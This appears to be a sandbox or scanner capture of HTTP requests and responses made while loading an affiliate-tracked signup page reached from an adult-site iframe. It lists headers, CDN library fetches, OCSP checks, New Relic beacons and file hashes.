Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Wed, 06 Jul 2022 11:30:29 GMT
Last-Modified: Wed, 06 Jul 2022 10:13:32 GMT
Server: ECS (bsa/EB1C)
X-Cache: Miss from cloudfront
Via: 1.1 227a1815a1677b9cf6dd587e443000b8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-P1
X-Amz-Cf-Id: -cWyhG4_zdrV1yTWKf9yV5PWEu56hUEueyUrCqrFPtkOQxLSsWy8BA==
Age: 4617

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C02392E54536262666988192AD9A1088F25AA405038B95CB2E72AD84630D3A64"
Last-Modified: Tue, 05 Jul 2022 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6078
Expires: Wed, 06 Jul 2022 13:11:48 GMT
Date: Wed, 06 Jul 2022 11:30:30 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "5AF3BC840A5FB02C03CCEBF976AEF68E554095FC8463212C5FD89ED910090332"
Last-Modified: Tue, 05 Jul 2022 12:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19009
Expires: Wed, 06 Jul 2022 16:47:19 GMT
Date: Wed, 06 Jul 2022 11:30:30 GMT
Connection: keep-alive

                                        
                                            GET /ajax/libs/jquery/3.4.1/jquery.min.js HTTP/1.1 
Host: ajax.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://jahebob.com
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.207.202
HTTP/2 200 OK
                                        
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="hosted-libraries-pushers"
report-to: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
timing-allow-origin: *
content-length: 30774
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sat, 02 Jul 2022 22:09:36 GMT
expires: Sun, 02 Jul 2023 22:09:36 GMT
cache-control: public, max-age=31536000, stale-while-revalidate=2592000
age: 307255
last-modified: Mon, 13 May 2019 14:37:17 GMT
content-type: text/javascript; charset=UTF-8
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65451)
Size:   30774
Md5:    81182f4b684635f6bdcbdd907ee66f25
Sha1:   a1f2f151df72ede41397c8131bd47a3ce85575b3
Sha256: be40946c98d9a78a3c7c9ad097d379ab12549a195bd7a4766919a1d3fd987396
                                        
                                            GET /ajax/bootstrap/3.3.7/bootstrap.min.js HTTP/1.1 
Host: ajax.aspnetcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://jahebob.com
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         152.199.19.160
HTTP/2 200 OK
                                        
content-encoding: gzip
accept-ranges: bytes
access-control-allow-origin: *
age: 30275590
cache-control: public,max-age=31536000
content-type: application/javascript
date: Wed, 06 Jul 2022 11:30:31 GMT
etag: "df64de7cb33d21:0"
last-modified: Mon, 31 Oct 2016 23:09:59 GMT
server: ECAcc (ska/F6C5)
timing-allow-origin: *
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 13045
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32033)
Size:   13045
Md5:    3f9ec5c445cf8f77a6390449a7541505
Sha1:   669418484f3303459663923b63a579a879727b05
Sha256: d93d22df61a1ecf911a54330835bb468fb26e5f10e0555cb48a464dfe69d7648
                                        
                                            GET /ajax/bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1 
Host: ajax.aspnetcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         152.199.19.160
HTTP/2 200 OK
                                        
content-encoding: gzip
accept-ranges: bytes
access-control-allow-origin: *
age: 1833767
cache-control: public,max-age=31536000
content-type: text/css
date: Wed, 06 Jul 2022 11:30:31 GMT
etag: "0e914f2cb33d21:0"
last-modified: Mon, 31 Oct 2016 23:10:18 GMT
server: ECAcc (ska/F740)
timing-allow-origin: *
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 19629
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65371)
Size:   19629
Md5:    7e2bb6028f0b19917a1a2d1944fc72b1
Sha1:   e1837fc75ee2ddd24c6e1df6b309ea212b57e681
Sha256: cc6093bd7162882fd34252fb5d3e8e7d07247e3b70fad894320bf2a960abeda5
                                        
                                            GET /signup/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff HTTP/1.1 
Host: tfcfnls.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://fuck-fantasy.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         207.120.33.39
HTTP/2 302 Found
                                        
date: Wed, 06 Jul 2022 11:30:30 GMT
content-type: text/html; charset=UTF-8
location: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
set-cookie: PHPSESSID=6268d206e078f965d7abaa2408ff401b; path=/; secure; SameSite=None
cache-control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
pragma: no-cache
expires: 0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
x-varnish: 16943737
age: 0
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Miss
section-io-id: 18c0de085130b1b6209325a0dff7efdd
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  gzip compressed data, max speed, from Unix\012- data
Size:   29886
Md5:    66a7630ff4484fac43325fdc9ddf4885
Sha1:   965ee99c2d43d3b2ebb2c06181646dcee3f0b20e
Sha256: 69285dca652c01399a39b081564951a5876d221a18c2708a0aa0a69f30fe902f
                                        
                                            GET /common_tpls/images/icons/email.png HTTP/1.1 
Host: jahebob.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         207.120.33.9
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: image/png
content-length: 1254
last-modified: Tue, 16 Jun 2020 16:45:10 GMT
etag: "5ee8f716-4e6"
section-io-cache-id: 2a1094a12cfc49a3069c8d2f01a59845
x-varnish: 10951642 10857638
age: 3317
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
accept-ranges: bytes
section-io-id: 03939a390ad23313f644c6fca2f48c48
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 26 x 26, 8-bit/color RGB, non-interlaced\012- data
Size:   1254
Md5:    a86d99b9176d82a211cfa29b2f0b353f
Sha1:   62947ddfd87e3a21869818885e4bfa4e55ad0c11
Sha256: f8e82194c97e2a11a8c77fcd55d1ded51a1943b78eefac8475890f665dc620f1
                                        
                                            GET /common_tpls/images/icons/password.png HTTP/1.1 
Host: jahebob.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         207.120.33.9
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: image/png
content-length: 1452
last-modified: Tue, 16 Jun 2020 16:45:10 GMT
etag: "5ee8f716-5ac"
section-io-cache-id: 5495abe621cb6522a0ccded46142b7e6
x-varnish: 12883815 15922179
age: 731
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
accept-ranges: bytes
section-io-id: 4a4738e5802ed4fb8cbd15446ec1638c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 26 x 26, 8-bit/color RGB, non-interlaced\012- data
Size:   1452
Md5:    6f100f1cdbdce928118ffa4c9293ca5b
Sha1:   6b1a3593e792d4c00187d60560dd03fb42df1156
Sha256: 8c1a6b9e0c63edc7fa86898148dc6493cd56113fabbf85d901f7af4c180fce74
                                        
                                            GET /common_tpls/images/icons/fname.png HTTP/1.1 
Host: jahebob.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         207.120.33.9
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: image/png
content-length: 1649
last-modified: Tue, 28 Nov 2017 20:51:58 GMT
etag: "5a1dcc6e-671"
section-io-cache-id: ee3008df309a674c37d5d59b19265435
x-varnish: 10951643 10857617
age: 3325
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
accept-ranges: bytes
section-io-id: 76116e969b09f65c805753dbd1d3c6af
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced\012- data
Size:   1649
Md5:    5c846870756544f39604e671d4111b9d
Sha1:   304938c74246e228fa82d8ca40201c3db6098074
Sha256: d43abf8c5665519a3fe3f7e90298fc17b62e06d8ada1b90a44ea9985a62abb4d
                                        
                                            GET /common_tpls/images/icons/address.png HTTP/1.1 
Host: jahebob.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         207.120.33.9
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: image/png
content-length: 1167
last-modified: Tue, 16 Jun 2020 16:45:10 GMT
etag: "5ee8f716-48f"
section-io-cache-id: b5774294bca0b5091681ef15dc4321d2
x-varnish: 12883816 16407334
age: 762
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
accept-ranges: bytes
section-io-id: 9c096d12ea866b4d4c630c5202b6a8e4
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 26 x 26, 8-bit/color RGB, non-interlaced\012- data
Size:   1167
Md5:    b579e9868402d708e54e1a980166c444
Sha1:   1c58e2890b934c0b1ab057f3ac28bedd2a082d19
Sha256: 67756f8b542c7823bcdba421219c3b8e1ee472748d8c3463534f667271356dfb
                                        
                                            GET /releases/v5.15.4/css/pro-v4-font-face.min.css?token=b314bdf1b3 HTTP/1.1 
Host: ka-p.fontawesome.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://jahebob.com/
Origin: https://jahebob.com
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.18.23.52
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: text/css
content-length: 2603
access-control-allow-origin: *
cache-control: max-age=31556926
content-encoding: gzip
etag: "610ae215-a2b"
last-modified: Wed, 04 Aug 2021 18:53:09 GMT
vary: Origin, Accept-Encoding, Access-Control-Request-Headers, Access-Control-Request-Method
cf-cache-status: HIT
age: 410238
accept-ranges: bytes
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 7268024298160b51-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (27832)
Size:   2603
Md5:    eaaabd3f60063923cd5333eb1d7a20a1
Sha1:   0da69706105e28896a1f6eeaa91d5bec1b82f7f1
Sha256: f863309ec0ac675409167610ff9776fa9c7620d6ee3592cc0c19d0b883ff2f70
                                        
                                            GET /common_tpls/js/form_support.js?v=1516308712 HTTP/1.1 
Host: jahebob.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         207.120.33.9
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Tue, 19 Jan 2021 00:12:19 GMT
etag: W/"600623e3-3d1"
section-io-cache-id: 3b38e74c214f12cccc966e55ccc4ea33
x-varnish: 10951641 10885453
age: 3315
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
content-encoding: gzip
section-io-id: 0ed5bf30741981518fd990ef80ab891b
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (26366)
Size:   4715
Md5:    0f933f47f2bca6f8e62cebdc4ce264f6
Sha1:   7bac167eba53aebc8ffc61eb34e78bb4427e6409
Sha256: 1887debeafa96b7085773c88c7919f8f73163ee2ca47a2e8ea1bb8a343c823a3
                                        
                                            GET /common_tpls/js/validate_form_v2.js?jsv=24 HTTP/1.1 
Host: jahebob.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         207.120.33.9
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Thu, 26 May 2022 18:57:54 GMT
etag: W/"628fcdb2-5a4a"
section-io-cache-id: b2feb59a57d3190d02f6b52e5c4746cd
x-varnish: 12883814 13521790
age: 821
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
content-encoding: gzip
section-io-id: 084a8a78695d4db2188089e31a5558aa
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Algol 68 source text\012- Pascal source, Unicode text, UTF-8 text, with very long lines (42283)
Size:   59782
Md5:    53a98329475d7cd49b2acd16115195f3
Sha1:   df78b36b164e146b25e78c72b1a87d1665db279b
Sha256: a4dd399ed95bd089f69aa0223820d307549cb97edf92a35678ad5bc0336fc46f
                                        
                                            POST /gsalphasha2g2 HTTP/1.1 
Host: ocsp2.globalsign.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.18.21.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 06 Jul 2022 11:30:31 GMT
Content-Length: 1423
Connection: keep-alive
Expires: Sun, 10 Jul 2022 09:59:46 GMT
ETag: "399e5db6762e02d3f433e334a6c02f6ada5763b0"
Last-Modified: Wed, 06 Jul 2022 09:59:46 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 1363
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 72680242ba5eb50c-OSL


--- Additional Info ---
Magic:  data
Size:   1423
Md5:    6ab72ac3f746b923bfde482deba9e3cc
Sha1:   399e5db6762e02d3f433e334a6c02f6ada5763b0
Sha256: ef2bc9806b7e3557348a2ce89aa84c2f7badfdf314df03240f13f0cd08f31851
                                        
                                            GET /nr-spa-1216.min.js HTTP/1.1 
Host: js-agent.newrelic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.86.137
HTTP/2 200 OK
                                        
x-amz-id-2: TAwVDFAylU9PwNPPW/eXC4UyIMC8EQ1d6JNW9Q+uXGnPmL1fuimq9M3lAe733gCMeKNDiCQX1YM=
x-amz-request-id: SYTECJR5CMD8NJ8E
last-modified: Thu, 14 Apr 2022 16:45:57 GMT
etag: "63e2df852d15ab21d7ff8fc4363222e8"
x-amz-version-id: UU.F5jvoumAjQChriwTQHbisCFw_OInU
content-type: application/javascript
server: AmazonS3
cache-control: public, max-age=7200, stale-if-error=604800
content-encoding: gzip
accept-ranges: bytes
date: Wed, 06 Jul 2022 11:30:31 GMT
via: 1.1 varnish
x-served-by: cache-bma1680-BMA
x-cache: HIT
x-cache-hits: 3086
x-timer: S1657107032.773206,VS0,VE0
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
content-length: 18216
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32010)
Size:   18216
Md5:    6561a2403142205f966207d61576f1a6
Sha1:   1310e72f494e12ab63a4280fc1600a2c89dc9bb8
Sha256: 0e496fcab0b9120938373e271fa6631b7da17adf33f8a490637467c170a3e37a
                                        
                                            GET /1/NRJS-53a3e8e5a523894a2ee?a=936088839&v=1216.487a282&to=M1JTNkMACEoAVRcNDAoYZBBYTg9XBVMbShMMRw%3D%3D&rst=3536&ck=1&ref=https://jahebob.com/acct/epc69324/add/&ap=96&be=3035&fe=3462&dc=3459&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1657107028219,%22n%22:0,%22f%22:2156,%22dn%22:2158,%22dne%22:2229,%22c%22:2229,%22s%22:2342,%22ce%22:2573,%22rq%22:2573,%22rp%22:2915,%22rpe%22:2915,%22dl%22:2921,%22di%22:3449,%22ds%22:3459,%22de%22:3461,%22dc%22:3461,%22l%22:3461,%22le%22:3463%7D,%22navigation%22:%7B%7D%7D&at=HxVQQAsaG0Q%3D&jsonp=NREUM.setToken HTTP/1.1 
Host: bam.nr-data.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         162.247.241.14
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Wed, 06 Jul 2022 11:30:32 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 726802457815b50f-OSL
Access-Control-Allow-Origin: *
Set-Cookie: JSESSIONID=5fdc6d425462294f; Path=/; Domain=.nr-data.net; Secure; SameSite=None
CF-Cache-Status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
Cross-Origin-Resource-Policy: cross-origin
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Vary: Accept-Encoding
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   77
Md5:    f1442f5831dbbe0210da2d7a4180d6b8
Sha1:   2ade23c6c7a001c66f0c0a9a101ec152747b434e
Sha256: c6acf9fb2ecc1b144c51bd0337bbf1c26db3df2f649ac2da5c56db20d93eb3ef
                                        
                                            POST /events/1/NRJS-53a3e8e5a523894a2ee?a=936088839&v=1216.487a282&to=M1JTNkMACEoAVRcNDAoYZBBYTg9XBVMbShMMRw%3D%3D&rst=3995&ck=1&ref=https://jahebob.com/acct/epc69324/add/ HTTP/1.1 
Host: bam.nr-data.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
content-type: text/plain
Content-Length: 672
Origin: https://jahebob.com
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         162.247.241.14
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Wed, 06 Jul 2022 11:30:32 GMT
Content-Length: 24
Connection: keep-alive
CF-Ray: 726802479b06b50f-OSL
Access-Control-Allow-Origin: https://jahebob.com
CF-Cache-Status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Vary: Accept-Encoding
Server: cloudflare


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   24
Md5:    bc32ed98d624acb4008f986349a20d26
Sha1:   2d3df8c11d2168ce2c27e0937421d11d85016361
Sha256: 0c9cf152a0ad00d4f102c93c613c104914be5517ac8f8e0831727f8bfbe8b300